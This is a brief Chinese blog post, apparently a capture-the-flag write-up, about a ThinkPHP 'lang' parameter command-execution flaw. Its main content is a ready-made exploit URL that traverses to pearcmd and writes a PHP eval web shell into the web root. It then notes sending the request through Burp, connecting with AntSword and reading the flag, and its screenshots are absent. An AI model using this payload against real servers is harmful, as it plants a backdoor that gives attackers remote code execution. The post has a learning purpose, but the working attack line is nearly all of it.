thinkphp lang 命令执行

使用网上的exp

/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php

要用bp抓包了使用,我猜应该是编码问题
image
蚁剑连接
image
查看flag
image

posted @ 2026-01-21 16:53  大雪深埋  阅读(1)  评论(0)    收藏  举报